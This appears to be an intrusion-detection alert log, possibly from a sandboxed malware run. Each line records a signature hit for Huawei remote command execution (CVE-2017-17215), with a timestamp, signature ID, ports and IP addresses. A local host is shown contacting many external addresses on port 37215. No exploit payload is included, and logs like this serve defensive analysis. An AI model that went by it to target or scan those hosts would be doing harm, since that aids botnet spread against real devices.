                                                    07/10/24-08:26:31.075105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399037215192.168.2.14112.187.188.206
                                                    07/10/24-08:26:22.240968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861237215192.168.2.1441.221.59.192
                                                    07/10/24-08:27:33.746673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960237215192.168.2.14140.186.173.225
                                                    07/10/24-08:27:11.503966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093837215192.168.2.14197.224.12.45
                                                    07/10/24-08:27:30.535069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845637215192.168.2.14197.242.84.50
                                                    07/10/24-08:26:25.441344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928637215192.168.2.14197.134.228.75
                                                    07/10/24-08:27:08.426882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605437215192.168.2.1441.56.104.82
                                                    07/10/24-08:26:49.789175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221637215192.168.2.1436.102.167.225
                                                    07/10/24-08:26:33.257130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.1441.102.177.176
                                                    07/10/24-08:27:30.562651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553637215192.168.2.1441.105.127.67
                                                    07/10/24-08:27:28.074173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413837215192.168.2.1441.87.233.12
                                                    07/10/24-08:27:07.249452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690837215192.168.2.14141.152.16.207
                                                    07/10/24-08:27:08.403576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099237215192.168.2.14157.29.244.108
                                                    07/10/24-08:27:08.371486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695237215192.168.2.14194.40.216.219
                                                    07/10/24-08:27:24.927319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533637215192.168.2.14197.33.73.89
                                                    07/10/24-08:27:31.547528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199037215192.168.2.14105.120.155.126
                                                    07/10/24-08:26:11.466916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999037215192.168.2.14197.242.248.238
                                                    07/10/24-08:26:31.071097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.148.198.239.122
                                                    07/10/24-08:26:11.144714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493637215192.168.2.14157.212.90.236
                                                    07/10/24-08:27:32.507738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509437215192.168.2.1485.41.224.154
                                                    07/10/24-08:27:16.994727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327837215192.168.2.14157.68.194.127
                                                    07/10/24-08:27:23.848972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472637215192.168.2.14197.248.112.150
                                                    07/10/24-08:27:17.098663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.14197.12.37.174
                                                    07/10/24-08:27:19.293782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152237215192.168.2.1441.7.111.176
                                                    07/10/24-08:27:24.933902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453837215192.168.2.1459.55.183.24
                                                    07/10/24-08:26:59.612938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518237215192.168.2.1441.56.136.40
                                                    07/10/24-08:26:22.213907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891837215192.168.2.1441.173.143.223
                                                    07/10/24-08:26:22.296401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334437215192.168.2.1441.243.85.198
                                                    07/10/24-08:27:14.834981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269037215192.168.2.14222.122.172.222
                                                    07/10/24-08:26:55.462575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225437215192.168.2.1441.165.204.8
                                                    07/10/24-08:27:30.526140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447637215192.168.2.14157.226.13.184
                                                    07/10/24-08:26:43.611873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484237215192.168.2.1441.63.35.157
                                                    07/10/24-08:26:20.178441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763637215192.168.2.1493.215.55.32
                                                    07/10/24-08:27:33.850046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786837215192.168.2.14197.207.79.207
                                                    07/10/24-08:27:19.211343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761237215192.168.2.1441.205.80.129
                                                    07/10/24-08:26:14.625043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.1441.102.253.177
                                                    07/10/24-08:27:32.599203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415237215192.168.2.14197.220.191.223
                                                    07/10/24-08:26:26.583861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788837215192.168.2.14157.248.158.253
                                                    07/10/24-08:26:47.739348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838037215192.168.2.14163.220.169.12
                                                    07/10/24-08:26:15.861470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051837215192.168.2.1441.23.129.83
                                                    07/10/24-08:27:13.800580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360237215192.168.2.14157.154.225.97
                                                    07/10/24-08:27:10.604407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.14157.48.13.244
                                                    07/10/24-08:27:03.015604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560437215192.168.2.1441.247.113.169
                                                    07/10/24-08:26:59.780112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436037215192.168.2.1441.142.189.36
                                                    07/10/24-08:27:02.860039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254437215192.168.2.1441.105.37.10
                                                    07/10/24-08:26:34.215395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514037215192.168.2.1441.155.56.122
                                                    07/10/24-08:27:30.499303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941437215192.168.2.1441.218.51.119
                                                    07/10/24-08:26:43.799492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058637215192.168.2.1441.1.191.20
                                                    07/10/24-08:26:17.985444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617637215192.168.2.14157.73.138.40
                                                    07/10/24-08:26:14.777167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007037215192.168.2.1413.13.212.130
                                                    07/10/24-08:27:17.044301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106837215192.168.2.1441.239.119.51
                                                    07/10/24-08:26:17.997634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211037215192.168.2.14157.113.1.146
                                                    07/10/24-08:26:42.386874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554237215192.168.2.1486.65.144.34
                                                    07/10/24-08:26:13.805293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654037215192.168.2.14197.62.133.159
                                                    07/10/24-08:27:33.810871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615237215192.168.2.1441.12.215.200
                                                    07/10/24-08:26:38.608013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559437215192.168.2.14197.45.92.129
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327237215192.168.2.14190.151.3.45
                                                    07/10/24-08:26:25.423127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383037215192.168.2.14107.76.241.12
                                                    07/10/24-08:27:31.530342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982037215192.168.2.1441.109.52.93
                                                    07/10/24-08:26:25.512620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469037215192.168.2.1441.195.86.203
                                                    07/10/24-08:27:05.199033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164437215192.168.2.1441.80.110.143
                                                    07/10/24-08:26:57.667686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079837215192.168.2.1441.236.117.29
                                                    07/10/24-08:26:59.631449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705637215192.168.2.14157.20.255.181
                                                    07/10/24-08:27:19.334361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079637215192.168.2.14197.63.222.194
                                                    07/10/24-08:27:30.529123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349837215192.168.2.1424.196.193.195
                                                    07/10/24-08:27:28.140303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399437215192.168.2.14197.218.247.16
                                                    07/10/24-08:26:42.422786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298837215192.168.2.14197.47.73.127
                                                    07/10/24-08:26:28.907657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580437215192.168.2.14197.240.33.149
                                                    07/10/24-08:26:28.912522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468037215192.168.2.14197.46.253.151
                                                    07/10/24-08:26:22.219271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361837215192.168.2.1423.66.236.57
                                                    07/10/24-08:26:26.621338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.1452.174.49.219
                                                    07/10/24-08:26:13.829838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096837215192.168.2.14135.160.124.223
                                                    07/10/24-08:27:33.977851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095237215192.168.2.14157.73.175.35
                                                    07/10/24-08:26:51.979498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828037215192.168.2.14203.10.157.244
                                                    07/10/24-08:27:07.396195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807637215192.168.2.14157.129.141.164
                                                    07/10/24-08:26:41.356142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996437215192.168.2.1441.240.79.129
                                                    07/10/24-08:27:20.476288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617837215192.168.2.14191.61.28.199
                                                    07/10/24-08:27:33.719591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996837215192.168.2.1449.242.117.155
                                                    07/10/24-08:27:33.907350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417637215192.168.2.14157.200.204.223
                                                    07/10/24-08:26:14.822403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414837215192.168.2.14157.228.89.26
                                                    07/10/24-08:27:10.609289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998437215192.168.2.1446.121.13.134
                                                    07/10/24-08:26:13.753198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457037215192.168.2.14197.66.186.228
                                                    07/10/24-08:26:13.770173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497437215192.168.2.14197.33.215.163
                                                    07/10/24-08:26:45.651870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459037215192.168.2.1441.237.195.224
                                                    07/10/24-08:26:49.834226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085437215192.168.2.1441.209.232.81
                                                    07/10/24-08:26:33.240926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530637215192.168.2.1441.16.250.178
                                                    07/10/24-08:27:14.825721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427237215192.168.2.14197.238.220.88
                                                    07/10/24-08:26:36.330263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353437215192.168.2.14164.80.159.49
                                                    07/10/24-08:27:19.273517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162037215192.168.2.14197.237.0.2
                                                    07/10/24-08:26:43.756816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089837215192.168.2.1462.1.97.110
                                                    07/10/24-08:26:47.994983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609037215192.168.2.1441.221.59.71
                                                    07/10/24-08:27:08.292771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484237215192.168.2.142.170.24.212
                                                    07/10/24-08:26:57.641730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497637215192.168.2.14197.240.6.119
                                                    07/10/24-08:26:22.300901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018037215192.168.2.14129.217.157.124
                                                    07/10/24-08:26:28.866778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693437215192.168.2.14173.102.133.179
                                                    07/10/24-08:26:34.188754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041437215192.168.2.14197.11.104.191
                                                    07/10/24-08:27:10.605753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475837215192.168.2.1441.43.59.46
                                                    07/10/24-08:26:26.524985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366037215192.168.2.14157.164.197.63
                                                    07/10/24-08:26:47.891770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606037215192.168.2.14197.42.129.210
                                                    07/10/24-08:26:49.842206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547037215192.168.2.1441.28.225.140
                                                    07/10/24-08:26:15.860013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852037215192.168.2.1482.85.196.23
                                                    07/10/24-08:27:19.152826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677437215192.168.2.1452.251.73.131
                                                    07/10/24-08:26:59.649070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542637215192.168.2.14197.255.39.131
                                                    07/10/24-08:26:41.462014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434837215192.168.2.14197.173.224.254
                                                    07/10/24-08:27:24.990905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754237215192.168.2.14197.116.94.37
                                                    07/10/24-08:27:22.896785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084837215192.168.2.14197.37.218.251
                                                    07/10/24-08:26:59.566844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099037215192.168.2.1481.43.133.104
                                                    07/10/24-08:27:07.255298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030237215192.168.2.14197.145.237.222
                                                    07/10/24-08:27:22.853545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652037215192.168.2.14197.212.190.180
                                                    07/10/24-08:27:30.522972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208437215192.168.2.1466.196.134.208
                                                    07/10/24-08:26:49.837905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675837215192.168.2.14197.219.45.213
                                                    07/10/24-08:26:53.121888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847237215192.168.2.14157.33.181.5
                                                    07/10/24-08:26:55.446597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612637215192.168.2.1441.26.40.9
                                                    07/10/24-08:26:43.737696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978037215192.168.2.14204.163.149.58
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531237215192.168.2.14157.169.74.158
                                                    07/10/24-08:26:43.587984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322637215192.168.2.14197.250.82.147
                                                    07/10/24-08:26:22.207243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903637215192.168.2.1441.36.30.69
                                                    07/10/24-08:26:43.594845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362037215192.168.2.14157.105.218.235
                                                    07/10/24-08:26:18.037759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836837215192.168.2.14163.97.78.197
                                                    07/10/24-08:26:23.314793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268237215192.168.2.14119.205.92.1
                                                    07/10/24-08:26:34.245550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999037215192.168.2.14157.124.158.37
                                                    07/10/24-08:26:38.634694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820037215192.168.2.14197.47.23.64
                                                    07/10/24-08:26:26.594913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192637215192.168.2.14197.120.17.106
                                                    07/10/24-08:26:15.852897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764837215192.168.2.14157.255.10.72
                                                    07/10/24-08:26:33.252784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605037215192.168.2.1441.82.32.196
                                                    07/10/24-08:27:02.819826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087437215192.168.2.14157.201.103.68
                                                    07/10/24-08:27:24.886736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665237215192.168.2.14197.183.164.146
                                                    07/10/24-08:26:28.926609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433237215192.168.2.14141.194.232.125
                                                    07/10/24-08:26:36.399682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613437215192.168.2.1441.143.233.151
                                                    07/10/24-08:26:34.242773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404237215192.168.2.14157.186.246.162
                                                    07/10/24-08:27:23.500429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.14197.251.140.96
                                                    07/10/24-08:26:41.303627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607037215192.168.2.14157.164.249.146
                                                    07/10/24-08:26:42.410234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606637215192.168.2.14173.52.56.140
                                                    07/10/24-08:27:27.096599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995437215192.168.2.1441.154.252.205
                                                    07/10/24-08:26:41.512064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776037215192.168.2.1441.46.78.184
                                                    07/10/24-08:26:36.425818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244437215192.168.2.14197.99.138.26
                                                    07/10/24-08:26:43.891312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469637215192.168.2.14197.107.13.222
                                                    07/10/24-08:26:47.964630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422637215192.168.2.1441.168.4.116
                                                    07/10/24-08:27:05.217430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684837215192.168.2.1451.152.171.146
                                                    07/10/24-08:27:27.047210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947237215192.168.2.14146.58.37.202
                                                    07/10/24-08:27:19.285425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805237215192.168.2.14149.81.17.197
                                                    07/10/24-08:27:02.811605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763837215192.168.2.14157.229.70.60
                                                    07/10/24-08:26:29.880668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591837215192.168.2.14157.148.211.147
                                                    07/10/24-08:26:25.435819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047237215192.168.2.14197.3.232.129
                                                    07/10/24-08:27:05.121354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906437215192.168.2.14157.231.236.90
                                                    07/10/24-08:27:30.542480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454837215192.168.2.1441.167.36.81
                                                    07/10/24-08:26:51.987435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313437215192.168.2.1441.244.23.12
                                                    07/10/24-08:27:23.866031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724637215192.168.2.14169.11.135.203
                                                    07/10/24-08:26:43.798286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333637215192.168.2.1441.223.69.223
                                                    07/10/24-08:27:23.937541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649037215192.168.2.14173.188.41.226
                                                    07/10/24-08:26:22.275935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605037215192.168.2.14197.180.3.109
                                                    07/10/24-08:26:29.883547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121237215192.168.2.1441.34.26.219
                                                    07/10/24-08:26:38.609336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695237215192.168.2.14197.17.43.52
                                                    07/10/24-08:26:18.003216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222637215192.168.2.14157.18.110.174
                                                    07/10/24-08:27:31.479319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377637215192.168.2.14150.61.190.106
                                                    07/10/24-08:27:14.830052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410437215192.168.2.1441.24.114.80
                                                    07/10/24-08:27:31.485057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148637215192.168.2.14157.74.253.48
                                                    07/10/24-08:27:28.181617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582637215192.168.2.14157.66.152.255
                                                    07/10/24-08:27:11.522435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5444237215192.168.2.14157.112.26.224
                                                    07/10/24-08:27:30.538484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843437215192.168.2.14197.74.43.136
                                                    07/10/24-08:26:11.105620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050837215192.168.2.1441.70.199.121
                                                    07/10/24-08:26:31.109229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544237215192.168.2.14157.103.181.103
                                                    07/10/24-08:27:00.602684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884037215192.168.2.14157.76.60.117
                                                    07/10/24-08:26:29.877768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405837215192.168.2.14157.113.238.226
                                                    07/10/24-08:26:38.524436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287437215192.168.2.14216.28.100.167
                                                    07/10/24-08:26:17.985178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.1441.102.36.84
                                                    07/10/24-08:26:14.811511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298837215192.168.2.14157.19.87.48
                                                    07/10/24-08:27:14.026941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178637215192.168.2.1451.233.164.173
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753837215192.168.2.14157.73.54.218
                                                    07/10/24-08:27:30.483664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383837215192.168.2.1441.34.157.145
                                                    07/10/24-08:26:28.850354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096837215192.168.2.14157.86.247.66
                                                    07/10/24-08:27:22.929011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160037215192.168.2.1441.177.190.141
                                                    07/10/24-08:27:03.035788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254237215192.168.2.14157.6.46.245
                                                    07/10/24-08:27:07.384495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806437215192.168.2.1441.22.197.157
                                                    07/10/24-08:27:23.781687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138237215192.168.2.14197.193.243.125
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883637215192.168.2.14197.128.35.250
                                                    07/10/24-08:26:43.742007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405837215192.168.2.1438.28.154.79
                                                    07/10/24-08:26:36.377315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464637215192.168.2.14197.129.225.199
                                                    07/10/24-08:27:22.879790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707837215192.168.2.1441.30.223.251
                                                    07/10/24-08:26:43.896757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021637215192.168.2.14107.157.80.136
                                                    07/10/24-08:26:47.851714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228837215192.168.2.14197.213.168.102
                                                    07/10/24-08:27:13.965572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435037215192.168.2.14114.85.129.43
                                                    07/10/24-08:26:41.402379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135637215192.168.2.14197.237.165.233
                                                    07/10/24-08:27:05.164336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091237215192.168.2.1437.111.142.157
                                                    07/10/24-08:27:33.758146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504637215192.168.2.14197.20.181.115
                                                    07/10/24-08:27:27.041359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141037215192.168.2.14157.108.15.229
